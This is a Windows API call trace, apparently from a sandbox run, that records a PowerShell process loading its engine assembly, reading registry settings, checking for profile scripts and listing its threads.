	[0691.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.356] CoTaskMemAlloc (cb=0x104) returned 0x2f95e0
	[0691.356] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f95e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0691.356] CoTaskMemFree (pv=0x2f95e0) 
	[0691.357] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.357] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.357] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0693.074] CoTaskMemAlloc (cb=0x104) returned 0x2f95e0
	[0693.074] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f95e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0693.074] CoTaskMemFree (pv=0x2f95e0) 
	[0693.085] CoTaskMemAlloc (cb=0x104) returned 0x2f95e0
	[0693.085] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f95e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0693.085] CoTaskMemFree (pv=0x2f95e0) 
	[0693.086] CoTaskMemAlloc (cb=0x104) returned 0x2f95e0
	[0693.086] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f95e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0693.086] CoTaskMemFree (pv=0x2f95e0) 
	[0693.086] CoTaskMemAlloc (cb=0x104) returned 0x2f95e0
	[0693.086] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f95e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0693.086] CoTaskMemFree (pv=0x2f95e0) 
	[0693.087] CoTaskMemAlloc (cb=0x104) returned 0x2f95e0
	[0693.087] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f95e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0693.087] CoTaskMemFree (pv=0x2f95e0) 
	[0693.089] CoTaskMemAlloc (cb=0x104) returned 0x2f95e0
	[0693.089] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f95e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0693.089] CoTaskMemFree (pv=0x2f95e0) 
	[0693.089] CoTaskMemAlloc (cb=0x104) returned 0x2f95e0
	[0693.089] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f95e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0693.090] CoTaskMemFree (pv=0x2f95e0) 
	[0709.091] CoTaskMemAlloc (cb=0x104) returned 0x2f95e0
	[0709.092] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f95e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0709.092] CoTaskMemFree (pv=0x2f95e0) 
	[0714.578] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x2f96f0
	[0714.580] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x2f9800
	[0727.220] CoTaskMemAlloc (cb=0x104) returned 0x2f9910
	[0727.220] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f9910, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0727.220] CoTaskMemFree (pv=0x2f9910) 
	[0727.224] CoTaskMemAlloc (cb=0x104) returned 0x2f9910
	[0727.224] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f9910, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0727.224] CoTaskMemFree (pv=0x2f9910) 
	[0728.811] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.811] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.811] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.812] VirtualQuery (in: lpAddress=0x16bd60, lpBuffer=0x16cc20, dwLength=0x30 | out: lpBuffer=0x16cc20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0728.818] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16dbb8 | out: phkResult=0x16dbb8*=0x314) returned 0x0
	[0728.818] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16db3c, lpData=0x0, lpcbData=0x16db38*=0x0 | out: lpType=0x16db3c*=0x1, lpData=0x0, lpcbData=0x16db38*=0x56) returned 0x0
	[0728.818] CoTaskMemAlloc (cb=0x5a) returned 0x1b8f0620
	[0728.818] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16db0c, lpData=0x1b8f0620, lpcbData=0x16db08*=0x56 | out: lpType=0x16db0c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16db08*=0x56) returned 0x0
	[0728.818] CoTaskMemFree (pv=0x1b8f0620) 
	[0728.818] RegCloseKey (hKey=0x314) returned 0x0
	[0728.818] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16dbb8 | out: phkResult=0x16dbb8*=0x314) returned 0x0
	[0728.818] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16db3c, lpData=0x0, lpcbData=0x16db38*=0x0 | out: lpType=0x16db3c*=0x1, lpData=0x0, lpcbData=0x16db38*=0x56) returned 0x0
	[0728.818] CoTaskMemAlloc (cb=0x5a) returned 0x1b8f0620
	[0728.818] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16db0c, lpData=0x1b8f0620, lpcbData=0x16db08*=0x56 | out: lpType=0x16db0c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16db08*=0x56) returned 0x0
	[0728.818] CoTaskMemFree (pv=0x1b8f0620) 
	[0728.819] RegCloseKey (hKey=0x314) returned 0x0
	[0728.819] CoTaskMemAlloc (cb=0x20c) returned 0x1b8c1970
	[0728.819] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b8c1970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0730.879] CoTaskMemFree (pv=0x1b8c1970) 
	[0730.879] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x16d770, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0730.879] CoTaskMemAlloc (cb=0x20c) returned 0x1b8c1970
	[0730.879] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b8c1970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0730.879] CoTaskMemFree (pv=0x1b8c1970) 
	[0730.879] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x16d770, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0730.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x16d910, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0730.880] SetErrorMode (uMode=0x1) returned 0x1
	[0730.880] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x16db20 | out: lpFileInformation=0x16db20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0730.881] SetErrorMode (uMode=0x1) returned 0x1
	[0730.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x16d910, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0730.881] SetErrorMode (uMode=0x1) returned 0x1
	[0730.881] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x16db20 | out: lpFileInformation=0x16db20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0730.881] SetErrorMode (uMode=0x1) returned 0x1
	[0730.881] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x16d910, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0730.881] SetErrorMode (uMode=0x1) returned 0x1
	[0730.881] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x16db20 | out: lpFileInformation=0x16db20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0730.882] SetErrorMode (uMode=0x1) returned 0x1
	[0730.882] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x16d910, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0730.882] SetErrorMode (uMode=0x1) returned 0x1
	[0730.882] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x16db20 | out: lpFileInformation=0x16db20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0730.882] SetErrorMode (uMode=0x1) returned 0x1
	[0730.883] CoTaskMemAlloc (cb=0x104) returned 0x2f9910
	[0730.883] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f9910, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0730.883] CoTaskMemFree (pv=0x2f9910) 
	[0730.883] CoTaskMemAlloc (cb=0x104) returned 0x2f9910
	[0730.883] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f9910, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0730.883] CoTaskMemFree (pv=0x2f9910) 
	[0730.883] CoTaskMemAlloc (cb=0x104) returned 0x2f9910
	[0730.883] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f9910, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0730.884] CoTaskMemFree (pv=0x2f9910) 
	[0730.884] CoTaskMemAlloc (cb=0x104) returned 0x2f9910
	[0730.884] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f9910, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0730.884] CoTaskMemFree (pv=0x2f9910) 
	[0730.888] CoTaskMemAlloc (cb=0x104) returned 0x2f9910
	[0730.888] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f9910, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0730.888] CoTaskMemFree (pv=0x2f9910) 
	[0730.889] CoTaskMemAlloc (cb=0x104) returned 0x2f9910
	[0730.889] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f9910, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0730.889] CoTaskMemFree (pv=0x2f9910) 
	[0730.891] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0730.891] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x16dd00 | out: lpMode=0x16dd00) returned 1
	[0730.892] CoTaskMemAlloc (cb=0x104) returned 0x2f9910
	[0730.892] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f9910, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0730.892] CoTaskMemFree (pv=0x2f9910) 
	[0730.895] SetEvent (hEvent=0x31c) returned 1
	[0730.895] SetEvent (hEvent=0x314) returned 1
	[0730.895] SetEvent (hEvent=0x390) returned 1
	[0730.895] SetEvent (hEvent=0x2dc) returned 1
	[0730.897] CoTaskMemAlloc (cb=0x104) returned 0x2f9910
	[0730.897] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f9910, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0730.897] CoTaskMemFree (pv=0x2f9910) 
	[0730.898] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x16da58 | out: phkResult=0x16da58*=0x34c) returned 0x0
	[0730.898] RegQueryValueExW (in: hKey=0x34c, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x16d9dc, lpData=0x0, lpcbData=0x16d9d8*=0x0 | out: lpType=0x16d9dc*=0x0, lpData=0x0, lpcbData=0x16d9d8*=0x0) returned 0x2

Thread:
	id = 543
	os_tid = 0x13c0


Thread:
	id = 549
	os_tid = 0x13d8


Thread:
	id = 1002
	os_tid = 0x1a9c


Thread:
	id = 1008
	os_tid = 0x1ac0


Thread:
	id = 1018
	os_tid = 0x1b10


Thread:
	id = 1048
	os_tid = 0x1bec


Thread:
	id = 1051
	os_tid = 0x13d4

	[0544.133] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0641.213] LocalFree (hMem=0x257290) returned 0x0
	[0641.213] CloseHandle (hObject=0x314) returned 1
	[0641.214] CloseHandle (hObject=0x13) returned 1
	[0641.269] CloseHandle (hObject=0xf) returned 1
	[0641.270] RegCloseKey (hKey=0x2fc) returned 0x0
	[0641.270] RegCloseKey (hKey=0x2f8) returned 0x0
	[0641.270] RegCloseKey (hKey=0x2f4) returned 0x0
	[0641.270] LocalFree (hMem=0x2572c0) returned 0x0
	[0647.777] RegCloseKey (hKey=0x2fc) returned 0x0
	[0656.438] RegCloseKey (hKey=0x2fc) returned 0x0
	[0693.102] RegCloseKey (hKey=0x38c) returned 0x0
	[0693.103] RegCloseKey (hKey=0x388) returned 0x0
	[0693.103] RegCloseKey (hKey=0x364) returned 0x0
	[0693.103] RegCloseKey (hKey=0x3a0) returned 0x0
	[0693.103] RegCloseKey (hKey=0x380) returned 0x0
	[0693.104] RegCloseKey (hKey=0x37c) returned 0x0
	[0693.104] RegCloseKey (hKey=0x378) returned 0x0
	[0693.104] RegCloseKey (hKey=0x374) returned 0x0
	[0693.105] RegCloseKey (hKey=0x370) returned 0x0
	[0693.105] RegCloseKey (hKey=0x36c) returned 0x0
	[0693.105] RegCloseKey (hKey=0x368) returned 0x0
	[0693.105] RegCloseKey (hKey=0x340) returned 0x0
	[0693.106] RegCloseKey (hKey=0x39c) returned 0x0
	[0693.106] RegCloseKey (hKey=0x398) returned 0x0
	[0693.106] RegCloseKey (hKey=0x360) returned 0x0
